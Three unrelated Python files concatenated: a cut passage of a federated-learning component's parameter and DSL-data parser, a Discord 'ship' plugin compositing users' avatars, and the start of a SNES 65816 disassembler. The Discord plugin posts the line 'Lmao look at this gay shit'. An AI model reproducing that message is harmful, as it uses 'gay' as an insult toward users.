        Missing attributes on `param` fall back to defaults (EAFP).
        Returns self for chaining.
        """
        try:
            need_cv = param.cv_param.need_cv
        except AttributeError:
            need_cv = False
        self.need_cv = need_cv
        LOGGER.debug(component_parameters)
        try:
            need_run = param.need_run
        except AttributeError:
            # components run by default unless explicitly disabled
            need_run = True
        self.need_run = need_run
        LOGGER.debug("need_run: {}, need_cv: {}".format(self.need_run, self.need_cv))
        try:
            need_stepwise = param.stepwise_param.need_stepwise
        except AttributeError:
            need_stepwise = False
        self.need_stepwise = need_stepwise
        self.role = component_parameters["local"]["role"]
        self.host_party_idlist = component_parameters["role"].get("host")
        self.local_partyid = component_parameters["local"].get("party_id")
        self.guest_partyid = component_parameters["role"].get("guest")
        if self.guest_partyid is not None:
            # "guest" is configured as a list; only the first entry is used
            self.guest_partyid = self.guest_partyid[0]
        return self

    def parse_dsl_args(self, args):
        """Set the has_* flags from the DSL args dict ("model", "data", ...).

        Returns self for chaining.
        :raises DSLConfigError: if eval_data is configured together with
            validate_data or test_data.
        """
        if "model" in args:
            self.has_model = True
        if "isometric_model" in args:
            self.has_isometric_model = True
        data_sets = args.get("data")
        LOGGER.debug(f"parse_dsl_args data_sets: {data_sets}")
        if data_sets is None:
            return self
        for data_key, data_dicts in data_sets.items():
            data_keys = list(data_dicts.keys())
            for data_type in ["train_data", "eval_data", "validate_data", "test_data"]:
                if data_type in data_keys:
                    setattr(self, f"has_{data_type}", True)
                    data_keys.remove(data_type)
                    LOGGER.debug(f"[Data Parser], has_{data_type}:"
                                 f" {getattr(self, f'has_{data_type}')}")
            # any remaining key is treated as a plain ("normal") data input
            if len(data_keys) > 0:
                self.has_normal_input_data = True
        LOGGER.debug("[Data Parser], has_normal_data: {}".format(self.has_normal_input_data))
        if self.has_eval_data:
            if self.has_validate_data or self.has_test_data:
                raise DSLConfigError("eval_data input should not be configured simultaneously"
                                     " with validate_data or test_data")
        # self._abnormal_dsl_config_detect()
        return self

    def _abnormal_dsl_config_detect(self):
        """Validate mutual-exclusion rules between data and model inputs.

        :raises DSLConfigError: for any inconsistent DSL combination.
        """
        if self.has_validate_data:
            if not self.has_train_data:
                raise DSLConfigError("validate_data should be configured simultaneously"
                                     " with train_data")
        if self.has_train_data:
            if self.has_normal_input_data or self.has_test_data:
                raise DSLConfigError("train_data input should not be configured simultaneously"
                                     " with data or test_data")
        if self.has_normal_input_data:
            if self.has_train_data or self.has_validate_data or self.has_test_data:
                raise DSLConfigError("When data input has been configured, train_data, "
                                     "validate_data or test_data should not be configured.")
        if self.has_test_data:
            if not self.has_model:
                raise DSLConfigError("When test_data input has been configured, model "
                                     "input should be configured too.")
        if self.has_model:
            if self.has_train_data:
                raise DSLConfigError("train_data input and model input should not be "
                                     "configured simultaneously")
            if self.has_isometric_model:
                raise DSLConfigError("model and isometric_model should not be "
                                     "configured simultaneously")
            if not self.has_test_data and not self.has_normal_input_data:
                raise DSLConfigError("When model has been set, either test_data or "
                                     "data should be provided")
        if self.need_cv or self.need_stepwise:
            if not self.has_train_data:
                raise DSLConfigError("Train_data should be configured in cross-validate "
                                     "task or stepwise task")
            if self.has_validate_data or self.has_normal_input_data or \
                    self.has_test_data:
                raise DSLConfigError("Train_data should be set only in cross-validate "
                                     "task or stepwise task")
            if self.has_model or self.has_isometric_model:
                raise DSLConfigError("In cross-validate task or stepwise task, model "
                                     "or isometric_model should not be configured")

    def extract_input_data(self, args, model):
        """Split DSL data inputs into role-specific tables and plain data.

        :param args: DSL args dict whose "data" entry maps component name to
            {data_type: table-reference}
        :param model: component model providing obtain_data()
        :return: (train_data, validate_data, test_data, data) where `data`
            maps "cpn.key[.idx]" to tables; also fills the row counts and
            re-runs the DSL consistency check.
        """
        data_sets = args.get("data")
        model_data = {}
        data = {}
        if data_sets is None:
            # NOTE(review): this early exit returns a 2-tuple, but the caller
            # extract_running_rules unpacks 4 values — likely a latent bug on
            # the no-data path; confirm whether it is ever reached.
            return model_data, data
        LOGGER.debug(f"Input data_sets: {data_sets}")
        for cpn_name, data_dict in data_sets.items():
            for data_type in ["train_data", "eval_data", "validate_data", "test_data"]:
                if data_type in data_dict:
                    d_table = data_dict.get(data_type)
                    model_data[data_type] = model.obtain_data(d_table)
                    del data_dict[data_type]
            if len(data_dict) > 0:
                LOGGER.debug(f'data_dict: {data_dict}')
                for k, v in data_dict.items():
                    data_list = model.obtain_data(v)
                    LOGGER.debug(f"data_list: {data_list}")
                    if isinstance(data_list, list):
                        # multi-table inputs get an index suffix in the key
                        for i, data_i in enumerate(data_list):
                            data[".".join([cpn_name, k, str(i)])] = data_i
                    else:
                        data[".".join([cpn_name, k])] = data_list
        train_data = model_data.get('train_data')
        validate_data = None
        if self.has_train_data:
            # legacy "eval_data" plays the validate role when train data exists
            if self.has_eval_data:
                validate_data = model_data.get('eval_data')
            elif self.has_validate_data:
                validate_data = model_data.get('validate_data')
        test_data = None
        if self.has_test_data:
            test_data = model_data.get('test_data')
            self.has_test_data = True
        elif self.has_eval_data and not self.has_train_data:
            # eval_data without train_data is treated as test data
            test_data = model_data.get('eval_data')
            self.has_test_data = True
        # self.has_train_data = True if train_data else False
        # self.has_validate_data = True if (validate_data or self.has_eval_data) else False
        if validate_data or (self.has_train_data and self.has_eval_data):
            self.has_validate_data = True
        if self.has_train_data and is_table(train_data):
            self.input_data_count = train_data.count()
        elif self.has_normal_input_data:
            # NOTE(review): with several normal inputs, the count of the last
            # table iterated wins — confirm that is intended.
            for data_key, data_table in data.items():
                if is_table(data_table):
                    self.input_data_count = data_table.count()
        if self.has_validate_data and is_table(validate_data):
            self.input_eval_data_count = validate_data.count()
        self._abnormal_dsl_config_detect()
        LOGGER.debug(f"train_data: {train_data}, validate_data: {validate_data}, "
                     f"test_data: {test_data}, data: {data}")
        return train_data, validate_data, test_data, data

    def extract_running_rules(self, args, model):
        """Build the RunningFuncs schedule for this component.

        The schedule depends on the need_*/has_* flags: pass-through when
        need_run is off, cross-validation, stepwise, fit+predict, predict
        only, or plain fit/transform on normal data.
        """
        # train_data, eval_data, data = self.extract_input_data(args)
        train_data, validate_data, test_data, data = self.extract_input_data(args, model)
        running_funcs = RunningFuncs()
        # take the schema of the first available data table, if any
        schema = None
        for d in [train_data, validate_data, test_data]:
            if d is not None:
                schema = d.schema
                break
        if not self.need_run:
            running_funcs.add_func(model.pass_data, [data], save_result=True)
            return running_funcs
        if self.need_cv:
            running_funcs.add_func(model.cross_validation, [train_data])
            return running_funcs
        if self.need_stepwise:
            running_funcs.add_func(model.stepwise, [train_data], save_result=True)
            running_funcs.add_func(self.union_data, ["train"], use_previews=True, save_result=True)
            running_funcs.add_func(model.set_predict_data_schema, [schema],
                                   use_previews=True, save_result=True)
            return running_funcs
        if self.has_model or self.has_isometric_model:
            running_funcs.add_func(model.load_model, [args])
        if self.has_train_data and self.has_validate_data:
            # todo_func_list.extend([model.set_flowid, model.fit, model.set_flowid, model.predict])
            # todo_func_params.extend([['fit'], [train_data], ['validate'], [train_data, 'validate']])
            running_funcs.add_func(model.set_flowid, ['fit'])
            running_funcs.add_func(model.fit, [train_data, validate_data])
            running_funcs.add_func(model.set_flowid, ['validate'])
            running_funcs.add_func(model.predict, [train_data], save_result=True)
            running_funcs.add_func(model.set_flowid, ['predict'])
            running_funcs.add_func(model.predict, [validate_data], save_result=True)
            running_funcs.add_func(self.union_data, ["train", "validate"], use_previews=True, save_result=True)
            running_funcs.add_func(model.set_predict_data_schema, [schema],
                                   use_previews=True, save_result=True)
        elif self.has_train_data:
            running_funcs.add_func(model.set_flowid, ['fit'])
            running_funcs.add_func(model.fit, [train_data])
            running_funcs.add_func(model.set_flowid, ['validate'])
            running_funcs.add_func(model.predict, [train_data], save_result=True)
            running_funcs.add_func(self.union_data, ["train"], use_previews=True, save_result=True)
            running_funcs.add_func(model.set_predict_data_schema, [schema],
                                   use_previews=True, save_result=True)
        elif self.has_test_data:
            running_funcs.add_func(model.set_flowid, ['predict'])
            running_funcs.add_func(model.predict, [test_data], save_result=True)
            running_funcs.add_func(self.union_data, ["predict"], use_previews=True, save_result=True)
            running_funcs.add_func(model.set_predict_data_schema, [schema],
                                   use_previews=True, save_result=True)
        if self.has_normal_input_data and not self.has_model:
            running_funcs.add_func(model.extract_data, [data], save_result=True)
            running_funcs.add_func(model.set_flowid, ['fit'])
            running_funcs.add_func(model.fit, [], use_previews=True, save_result=True)
        if self.has_normal_input_data and self.has_model:
            running_funcs.add_func(model.extract_data, [data], save_result=True)
            running_funcs.add_func(model.set_flowid, ['transform'])
            running_funcs.add_func(model.transform, [], use_previews=True, save_result=True)
        return running_funcs

    @staticmethod
    def union_data(previews_data, name_list):
        """Tag each table's values with its stage name and union them.

        :param previews_data: list of tables (previous step results)
        :param name_list: stage names parallel to previews_data
        :return: single unioned table, or None when the input is empty or
            contains a None entry
        """
        if len(previews_data) == 0:
            return None
        if any([x is None for x in previews_data]):
            return None
        assert len(previews_data) == len(name_list)
        result_data = None
        for data, name in zip(previews_data, name_list):
            # LOGGER.debug("before mapValues, one data: {}".format(data.first()))
            # NOTE(review): the lambda closes over the loop variable `name`;
            # if mapValues evaluates lazily this is a late-binding hazard —
            # confirm tables evaluate eagerly here.
            data = data.mapValues(lambda value: value + [name])
            # LOGGER.debug("after mapValues, one data: {}".format(data.first()))
            if result_data is None:
                result_data = data
            else:
                LOGGER.debug(f"Before union, t1 count: {result_data.count()}, t2 count: {data.count()}")
                result_data = result_data.union(data)
                LOGGER.debug(f"After union, result count: {result_data.count()}")
            # LOGGER.debug("before out loop, one data: {}".format(result_data.first()))
        return result_data

    def set_union_func(self, func):
        # allow the owner to swap in a framework-specific union implementation
        self.union_data = func
|
from util import Events
from PIL import Image
import urllib.request
import re
import os
import unicodedata
# rudimentary regex match for finding syllables
# Matches one vowel (either case) or one digit; used with re.split, where
# the capture group keeps the matched delimiter in the result list.
SYLLABLE = "([aeiouyAEIOUY]|[0-9])"
class Plugin(object):
    """Discord "ship" command: mashes two mentioned users' display names
    together and composites their avatars onto a ship image."""

    def __init__(self, pm):
        self.pm = pm

    @staticmethod
    def register_events():
        """
        Define events that this plugin will listen to
        :return: A list of util.Events
        """
        return [Events.Command("ship")]

    async def handle_command(self, message_object, command, args):
        """
        Handle Events.Command events
        :param message_object: discord.Message object containing the message
        :param command: The name of the command (first word in the message, without prefix)
        :param args: List of words in the message
        """
        if command == "ship":
            await self.ship(message_object)

    async def ship(self, message_object):
        """
        Execute the ship command: build the combined name, render the image,
        and post it to the channel. All calls to self.pm.client are awaited.
        :param message_object: discord.Message object (mentions supply the users)
        """
        if not os.path.exists("cache/"):
            os.mkdir("cache/")
        if not os.path.exists("cache/avatar/"):
            os.mkdir("cache/avatar/")
        # BUG FIX: the original compared with `is`, which tests object
        # identity, not equality; use == for integer comparisons.
        if len(message_object.mentions) == 2:
            user1 = message_object.mentions[0]
            user2 = message_object.mentions[1]
        elif len(message_object.mentions) == 1:
            # self-ship: the single mentioned user plays both roles
            user1 = message_object.mentions[0]
            user2 = message_object.mentions[0]
        else:
            await self.pm.client.send_message(message_object.channel,
                                              "Please **mention** two users!")
            return
        # generate ship name
        n1 = user1.display_name
        n2 = user2.display_name
        u1_parts = re.split(SYLLABLE, n1)
        # needed to maintain vowels in split
        u1_parts = [u1_parts[i] + u1_parts[i + 1] for i in range(len(u1_parts) - 1)[0::2]]
        u2_parts = re.split(SYLLABLE, n2)
        u2_parts = [u2_parts[i] + u2_parts[i + 1] for i in range(len(u2_parts) - 1)[0::2]]
        # concatenate half of u1 syllables with u2 syllables(integer division, ew...)
        # dumb fix for words that cannot be split (non-latin character sets?)
        if len(u1_parts) == 0:
            u1_parts = [n1]
        if len(u2_parts) == 0:
            u2_parts = [n2]
        name = u1_parts[:len(u1_parts) // 2] + u2_parts[len(u2_parts) // 2:]
        name = "".join(name)
        # checks if last letter is omitted(bug fix, can be made more elegant)
        # BUG FIX: `is not` on single characters relies on string interning;
        # compare with != instead.
        if name[-1] != user2.display_name[-1]:
            name = name + user2.display_name[-1]
        # Generate Ship Image(clean up)
        # download/access images first
        user1_img = self.get_avatar(user1)
        if user1 is user2:
            # self-ship: show a hand instead of a second avatar
            images = [Image.open(user1_img).resize((256, 256)), Image.open('images/ship/ship.png'),
                      Image.open('images/ship/hand.png')]
        else:
            user2_img = self.get_avatar(user2)
            images = [Image.open(user1_img).resize((256, 256)), Image.open('images/ship/ship.png'),
                      Image.open(user2_img).resize((256, 256))]
        # combines images horizontally
        with open("ship.png", 'wb+') as f:
            new_im = Image.new('RGBA', (768, 256), (0, 0, 0, 0))
            new_im.paste(images[0], (0, 0))
            # the ship's own alpha channel is used as its paste mask
            new_im.paste(images[1], (256, 0), mask=images[1])
            new_im.paste(images[2], (512, 0))
            new_im.save(f, "PNG")
        with open("ship.png", 'rb') as f:
            await self.pm.client.send_file(
                message_object.channel, f, filename=None, content="""
**{}** *Lmao look at this gay shit*""".format(name))
        # drop the rendered output (and any stray downloads) from the cwd;
        # cached avatars live under cache/ and are untouched
        temp_images = [img for img in os.listdir(".") if img.endswith(".png") or img.endswith(".jpg")]
        for img in temp_images:
            os.remove(img)

    @staticmethod
    def get_avatar(user):
        """Return a local path to the user's avatar, downloading and caching
        it under cache/avatar/ on first use."""
        if not os.path.exists("cache/"):
            os.makedirs("cache")
        # BUG FIX: the original condition `user.avatar_url is "" or None`
        # parses as `(user.avatar_url is "") or None`, which is effectively
        # always falsy; test truthiness instead.
        if not user.avatar_url:
            url = user.default_avatar_url
            path = "cache/avatar/default_" + user.id + ".png"
        else:
            url = user.avatar_url
            path = "cache/avatar/" + user.avatar + ".png"
        if os.path.isfile(path):
            return path
        hdr = {'User-Agent': 'Mozilla/5.0'}
        req = urllib.request.Request(url, headers=hdr)
        page = urllib.request.urlopen(req)
        data = page.read()
        with open(path, 'wb+') as f:
            f.write(data)
        return path
|
<filename>main.py
from enum import Enum, auto
import collections
import io
import json
class AddressMode(Enum):
    """65816 addressing modes.

    BUG FIX: the original had a trailing comma after every auto() except the
    last, making most member values 1-tuples while StkRelIndIdxY was a plain
    int — inconsistent and surprising for anything that inspects .value.
    """
    Sig8 = auto()
    Imm8 = auto()
    Imm16 = auto()
    ImmX = auto()           # immediate; width follows the index (X) flag
    ImmM = auto()           # immediate; width follows the memory (M) flag
    Abs = auto()
    AbsIdxXInd = auto()
    AbsIdxX = auto()
    AbsIdxY = auto()
    AbsInd = auto()
    AbsIndLng = auto()
    AbsLngIdxX = auto()
    AbsLng = auto()
    AbsJmp = auto()
    AbsLngJmp = auto()
    Acc = auto()
    BlkMov = auto()
    DirIdxIndX = auto()
    DirIdxX = auto()
    DirIdxY = auto()
    DirIndIdxY = auto()
    DirIndLngIdxY = auto()
    DirIndLng = auto()
    DirInd = auto()
    Dir = auto()
    Imp = auto()
    RelLng = auto()
    Rel = auto()
    Stk = auto()
    StkRel = auto()
    StkRelIndIdxY = auto()
class MemoryMode(Enum):
    """Register-width state: 8-bit or 16-bit (the 65816 M/X flag values)."""
    EIGHT_BIT = auto()
    SIXTEEN_BIT = auto()
# Column width used when formatting the emitted assembly listing.
ASSEMBLY_OUTPUT_LINE_WIDTH = 60
# ROM layout: 8 banks of 64 KiB, runtime bank numbering starting at $80.
NUM_BANKS = 8
BANK_SIZE = 0x10000
BANK_START = 0x80
# Interrupt vector locations within the ROM bank.
# NOTE(review): $FFFC is the 65816 emulation-mode RESET vector; $FFEA/$FFEE
# are the native-mode NMI/IRQ vectors — confirm the mix is intended.
ROM_RESET_ADDR = 0xFFFC
ROM_NMI_ADDR = 0xFFEA
ROM_IRQ_ADDR = 0xFFEE
# One executed-instruction trace record: CPU flag-width states, the runtime
# address, and the function name(s) the tracer associated with it.
InstructionInfo = collections.namedtuple('InstructionInfo', 'memory_mode index_mode runtime_addr func_names')
# SNES hardware register addresses -> symbolic define names used in the
# emitted assembly ("!" prefix is the assembler's define syntax).
# BUG FIX: the "$4352" value had a trailing space, which would corrupt the
# emitted symbol name.
# NOTE(review): "WINDOW_2_*_POSTION_*" ($2128/$2129) looks like a typo for
# POSITION; left unchanged in case other emitted files reference the names.
hardware_registers = {
    "$2100": "!SCREEN_DISPLAY_REGISTER",
    "$2101": "!OAM_SIZE_AND_DATA_AREA_DESIGNATION",
    "$2102": "!ADDRESS_FOR_ACCESSING_OAM_LOW",
    "$2103": "!ADDRESS_FOR_ACCESSING_OAM_HIGH",
    "$2105": "!BG_MODE_AND_TILE_SIZE_SETTING",
    "$2106": "!MOSAIC_SIZE_AND_BG_ENABLE",
    "$2107": "!BG_1_ADDRESS_AND_SIZE",
    "$2108": "!BG_2_ADDRESS_AND_SIZE",
    "$2109": "!BG_3_ADDRESS_AND_SIZE",
    "$210A": "!BG_4_ADDRESS_AND_SIZE",
    "$210B": "!BG_1_AND_2_TILE_DATA_DESIGNATION",
    "$210C": "!BG_3_AND_4_TILE_DATA_DESIGNATION",
    "$210D": "!BG_1_H_SCROLL_OFFSET",
    "$210E": "!BG_1_V_SCROLL_OFFSET",
    "$210F": "!BG_2_H_SCROLL_OFFSET",
    "$2110": "!BG_2_V_SCROLL_OFFSET",
    "$2111": "!BG_3_H_SCROLL_OFFSET",
    "$2112": "!BG_3_V_SCROLL_OFFSET",
    "$2113": "!BG_4_H_SCROLL_OFFSET",
    "$2114": "!BG_4_V_SCROLL_OFFSET",
    "$2115": "!VRAM_ADDRESS_INCREMENT_VALUE",
    "$2116": "!ADDRESS_FOR_VRAM_READ_WRITE_LOW_BYTE",
    "$2117": "!ADDRESS_FOR_VRAM_READ_WRITE_HIGH_BYTE",
    "$211A": "!INITIAL_SETTING_FOR_MODE_7",
    "$211B": "!MODE_7_MATRIX_PARAMETER_A",
    "$211C": "!MODE_7_MATRIX_PARAMETER_B",
    "$211D": "!MODE_7_MATRIX_PARAMETER_C",
    "$211E": "!MODE_7_MATRIX_PARAMETER_D",
    "$211F": "!MODE_7_CENTER_POSITION_X",
    "$2120": "!MODE_7_CENTER_POSITION_Y",
    "$2121": "!ADDRESS_FOR_CG_RAM_WRITE",
    "$2123": "!BG_1_AND_2_WINDOW_MASK_SETTINGS",
    "$2124": "!BG_3_AND_4_WINDOW_MASK_SETTINGS",
    "$2125": "!OBJ_AND_COLOR_WINDOW_SETTINGS",
    "$2126": "!WINDOW_1_LEFT_POSITION_DESIGNATION",
    "$2127": "!WINDOW_1_RIGHT_POSITION_DESIGNATION",
    "$2128": "!WINDOW_2_LEFT_POSTION_DESIGNATION",
    "$2129": "!WINDOW_2_RIGHT_POSTION_DESIGNATION",
    "$212A": "!BG_1_2_3_4_WINDOW_LOGIC_SETTINGS",
    "$212B": "!COLOR_AND_OBJ_WINDOW_LOGIC_SETTINGS",
    "$212C": "!BG_AND_OBJECT_ENABLE_MAIN_SCREEN",
    "$212D": "!BG_AND_OBJECT_ENABLE_SUB_SCREEN",
    "$212E": "!WINDOW_MASK_DESIGNATION_FOR_MAIN_SCREEN",
    "$212F": "!WINDOW_MASK_DESIGNATION_FOR_SUB_SCREEN",
    "$2130": "!INITIAL_SETTINGS_FOR_COLOR_ADDITION",
    "$2131": "!ADD_SUBTRACT_SELECT_AND_ENABLE",
    "$2132": "!FIXED_COLOR_DATA",
    "$2133": "!SCREEN_INITIAL_SETTINGS",
    "$2140": "!APU_I_O_PORT_0",
    "$2141": "!APU_I_O_PORT_1",
    "$2142": "!APU_I_O_PORT_2",
    "$2143": "!APU_I_O_PORT_3",
    "$4016": "!JOY_A",
    "$4017": "!JOY_B",
    "$4200": "!NMI_V_H_COUNT_AND_JOYPAD_ENABLE",
    "$4201": "!PROGRAMMABLE_I_O_PORT_OUTPUT",
    "$4202": "!MULTIPLICAND_A",
    "$4203": "!MULTIPLIER_B",
    "$4204": "!DIVIDEND_LOW_BYTE",
    "$4205": "!DIVIDEND_HIGH_BYTE",
    "$4206": "!DIVISOR_B",
    "$4207": "!H_COUNT_TIMER",
    "$4208": "!H_COUNT_TIMER_MSB",
    "$4209": "!V_COUNT_TIMER",
    "$420A": "!V_COUNT_TIMER_MSB",
    "$420B": "!REGULAR_DMA_CHANNEL_ENABLE",
    "$420C": "!H_DMA_CHANNEL_ENABLE",
    "$420D": "!CYCLE_SPEED_DESIGNATION",
    "$4210": "!NMI_ENABLE",
    "$4211": "!IRQ_FLAG_BY_H_V_COUNT_TIMER",
    "$4212": "!H_V_BLANK_FLAGS_AND_JOYPAD_STATUS",
    "$4218": "!JOYPAD_1_DATA_LOW_BYTE",
    "$4219": "!JOYPAD_1_DATA_HIGH_BYTE",
    "$421A": "!JOYPAD_2_DATA_LOW_BYTE",
    "$421B": "!JOYPAD_2_DATA_HIGH_BYTE",
    "$421E": "!JOYPAD_4_DATA_LOW_BYTE",
    "$421F": "!JOYPAD_4_DATA_HIGH_BYTE",
    "$4300": "!DMA_0_PARAMS",
    "$4301": "!DMA_0_B_ADDRESS",
    "$4302": "!DMA_0_A_ADDRESS_LOW_BYTE",
    "$4303": "!DMA_0_A_ADDRESS_HIGH_BYTE",
    "$4304": "!DMA_0_A_ADDRESS_BANK",
    "$4305": "!DMA_0_BYTES_COUNT_LOW_BYTE",
    "$4306": "!DMA_0_BYTES_COUNT_HIGH_BYTE",
    "$4310": "!DMA_1_PARAMS",
    "$4311": "!DMA_1_B_ADDRESS",
    "$4312": "!DMA_1_A_ADDRESS_LOW_BYTE",
    "$4313": "!DMA_1_A_ADDRESS_HIGH_BYTE",
    "$4314": "!DMA_1_A_ADDRESS_BANK",
    "$4315": "!DMA_1_BYTES_COUNT_LOW_BYTE",
    "$4316": "!DMA_1_BYTES_COUNT_HIGH_BYTE",
    "$4320": "!DMA_2_PARAMS",
    "$4321": "!DMA_2_B_ADDRESS",
    "$4322": "!DMA_2_A_ADDRESS_LOW_BYTE",
    "$4323": "!DMA_2_A_ADDRESS_HIGH_BYTE",
    "$4324": "!DMA_2_A_ADDRESS_BANK",
    "$4325": "!DMA_2_BYTES_COUNT_LOW_BYTE",
    "$4326": "!DMA_2_BYTES_COUNT_HIGH_BYTE",
    "$4330": "!DMA_3_PARAMS",
    "$4331": "!DMA_3_B_ADDRESS",
    "$4332": "!DMA_3_A_ADDRESS_LOW_BYTE",
    "$4333": "!DMA_3_A_ADDRESS_HIGH_BYTE",
    "$4334": "!DMA_3_A_ADDRESS_BANK",
    "$4335": "!DMA_3_BYTES_COUNT_LOW_BYTE",
    "$4336": "!DMA_3_BYTES_COUNT_HIGH_BYTE",
    "$4340": "!DMA_4_PARAMS",
    "$4341": "!DMA_4_B_ADDRESS",
    "$4342": "!DMA_4_A_ADDRESS_LOW_BYTE",
    "$4343": "!DMA_4_A_ADDRESS_HIGH_BYTE",
    "$4344": "!DMA_4_A_ADDRESS_BANK",
    "$4345": "!DMA_4_BYTES_COUNT_LOW_BYTE",
    "$4346": "!DMA_4_BYTES_COUNT_HIGH_BYTE",
    "$4350": "!DMA_5_PARAMS",
    "$4351": "!DMA_5_B_ADDRESS",
    "$4352": "!DMA_5_A_ADDRESS_LOW_BYTE",
    "$4353": "!DMA_5_A_ADDRESS_HIGH_BYTE",
    "$4354": "!DMA_5_A_ADDRESS_BANK",
    "$4355": "!DMA_5_BYTES_COUNT_LOW_BYTE",
    "$4356": "!DMA_5_BYTES_COUNT_HIGH_BYTE",
    "$4360": "!DMA_6_PARAMS",
    "$4361": "!DMA_6_B_ADDRESS",
    "$4362": "!DMA_6_A_ADDRESS_LOW_BYTE",
    "$4363": "!DMA_6_A_ADDRESS_HIGH_BYTE",
    "$4364": "!DMA_6_A_ADDRESS_BANK",
    "$4365": "!DMA_6_BYTES_COUNT_LOW_BYTE",
    "$4366": "!DMA_6_BYTES_COUNT_HIGH_BYTE",
    "$4370": "!DMA_7_PARAMS",
    "$4371": "!DMA_7_B_ADDRESS",
    "$4372": "!DMA_7_A_ADDRESS_LOW_BYTE",
    "$4373": "!DMA_7_A_ADDRESS_HIGH_BYTE",
    "$4374": "!DMA_7_A_ADDRESS_BANK",
    "$4375": "!DMA_7_BYTES_COUNT_LOW_BYTE",
    "$4376": "!DMA_7_BYTES_COUNT_HIGH_BYTE",
    "$4216": "!PRODUCT_REMAINDER_RESULT_LOW_BYTE",
    "$2118": "!DATA_FOR_VRAM_WRITE_LOW_BYTE",
    "$4214": "!QUOTIENT_OF_DIVIDE_RESULT_LOW_BYTE",
    "$006000": "!DSP1_DATA_REGISTER",
    "$007000": "!DSP1_STATUS_REGISTER"
}
def get_operand_size(addr_mode, current_memory_mode, current_index_mode):
    """Return the number of operand bytes that follow the opcode byte.

    The flag-dependent immediate modes (ImmX / ImmM) take one byte when
    the corresponding register mode is eight-bit, otherwise two.
    """
    zero_byte_modes = (AddressMode.Acc, AddressMode.Imp, AddressMode.Stk)
    one_byte_modes = (AddressMode.DirIdxIndX, AddressMode.DirIdxX, AddressMode.DirIdxY,
                      AddressMode.DirIndIdxY, AddressMode.DirIndLngIdxY, AddressMode.DirIndLng,
                      AddressMode.DirInd, AddressMode.Dir, AddressMode.Sig8, AddressMode.Imm8,
                      AddressMode.Rel, AddressMode.StkRel, AddressMode.StkRelIndIdxY)
    two_byte_modes = (AddressMode.Abs, AddressMode.AbsIdxXInd, AddressMode.AbsIdxX,
                      AddressMode.AbsIdxY, AddressMode.AbsInd, AddressMode.AbsIndLng,
                      AddressMode.AbsJmp, AddressMode.BlkMov, AddressMode.Imm16,
                      AddressMode.RelLng)
    three_byte_modes = (AddressMode.AbsLngJmp, AddressMode.AbsLngIdxX, AddressMode.AbsLng)
    if addr_mode in zero_byte_modes:
        return 0
    if addr_mode in one_byte_modes:
        return 1
    if addr_mode in two_byte_modes:
        return 2
    if addr_mode in three_byte_modes:
        return 3
    if addr_mode is AddressMode.ImmX:
        return 1 if current_index_mode is MemoryMode.EIGHT_BIT else 2
    if addr_mode is AddressMode.ImmM:
        return 1 if current_memory_mode is MemoryMode.EIGHT_BIT else 2
def open_rom(file):
    """Read the ROM at *file* and return its entire contents as bytes."""
    with open(file, 'rb') as rom_file:
        return rom_file.read()
def open_executed_instruction_addresses(file):
    """Parse an instruction trace into a list of InstructionInfo records.

    Each line is "<memory_mode> <index_mode> <runtime_addr> [func ...]";
    any trailing function names belong to the executing call stack.
    """
    entries = []
    with open(file, 'r') as trace_file:
        for line in trace_file:
            fields = line.split(" ")
            assert len(fields) >= 3
            names = fields[3:]
            if names:
                # Only the final field carries the line's newline.
                names[-1] = names[-1].strip()
            entries.append(InstructionInfo(memory_mode=int(fields[0]),
                                           index_mode=int(fields[1]),
                                           runtime_addr=int(fields[2]),
                                           func_names=names))
    return entries
def open_pc_to_fixed_func_name(file):
    """Build {rom_offset: func_name} from "<pc> <name>" lines."""
    mapping = {}
    with open(file, 'r') as name_file:
        for line in name_file:
            fields = line.split(" ")
            assert len(fields) == 2
            rom_offset, _, _ = convert_runtime_address_to_rom(int(fields[0]))
            mapping[rom_offset] = fields[1].strip()
    return mapping
def open_jump_tables(file):
    """Build {rom_offset: {case: target_name}} from jump-table lines.

    Each line is "<pc> <case> <name> [<case> <name> ...]".
    """
    tables = {}
    with open(file, 'r') as table_file:
        for line in table_file:
            fields = line.split(" ")
            assert len(fields) >= 3
            rom_offset, _, _ = convert_runtime_address_to_rom(int(fields[0]))
            entries = {}
            # Remaining fields alternate between case value and target name.
            for i in range(1, len(fields), 2):
                entries[int(fields[i])] = fields[i + 1].strip()
            tables[rom_offset] = entries
    return tables
def open_return_address_manipulation_functions(file):
    """Build {func_name: pc} from "<func_name> <pc>" lines."""
    result = {}
    with open(file, 'r') as func_file:
        for line in func_file:
            fields = line.split(" ")
            assert len(fields) == 2
            result[fields[0]] = int(fields[1])
    return result
def get_bank_and_offset(addr):
    """Split a 24-bit SNES address into (bank byte, 16-bit bank offset)."""
    return (addr >> 16) & 0xFF, addr & 0xFFFF
def convert_runtime_address_to_rom(addr):
    """Map a runtime (HiROM) CPU address to its ROM file offset.

    Banks $00-$3F are taken as-is; the mirrored banks are shifted down to
    their canonical ROM location before splitting again.

    Returns:
        (rom_offset, bank, bank_offset) — bank/bank_offset recomputed
        from the adjusted address for mirrored banks.

    Raises:
        ValueError: if *addr* lies in a bank with no ROM mapping
            (e.g. the WRAM banks $7E-$7F).
    """
    bank, bank_offset = get_bank_and_offset(addr)
    if addr < 0x400000:
        # Banks $00-$3F already match the ROM layout directly.
        return addr, bank, bank_offset
    if 0x40 <= bank <= 0x7d:
        adjusted_address = addr - 0x400000
    elif 0x80 <= bank <= 0x9f:
        adjusted_address = addr - 0x800000
    elif 0xa0 <= bank <= 0xbf:
        adjusted_address = addr - 0xa00000 + 0x200000
    elif 0xc0 <= bank <= 0xfd:
        adjusted_address = addr - 0xc00000
    elif 0xfe <= bank <= 0xff:
        adjusted_address = addr - 0xc00000
    else:
        # Previously `assert False`, which is silently stripped under -O;
        # raise an explicit error for unmapped banks instead.
        raise ValueError(f"address ${addr:06X} is not in a ROM-mapped bank")
    bank, bank_offset = get_bank_and_offset(adjusted_address)
    return adjusted_address, bank, bank_offset
def open_label_addresses(file):
    """Parse label lines into (set of ROM offsets, {offset: {func: bool}}).

    Each line is "<addr> <func_name> <flag> [<func_name> <flag> ...]".
    """
    labels = set()
    labels_to_functions = {}
    with open(file, 'r') as label_file:
        for line in label_file:
            fields = line.split(" ")
            assert len(fields) >= 3
            offset, _, _ = convert_runtime_address_to_rom(int(fields[0]))
            entries = {}
            # Remaining fields alternate between function name and 0/1 flag.
            for i in range(1, len(fields), 2):
                entries[fields[i]] = bool(int(fields[i + 1]))
            labels.add(offset)
            labels_to_functions[offset] = entries
    return labels, labels_to_functions
def get_operand(rom_data, operand_size):
    """Decode a little-endian operand of 1-3 bytes from *rom_data*.

    Args:
        rom_data: bytes (or sequence of ints) starting at the operand.
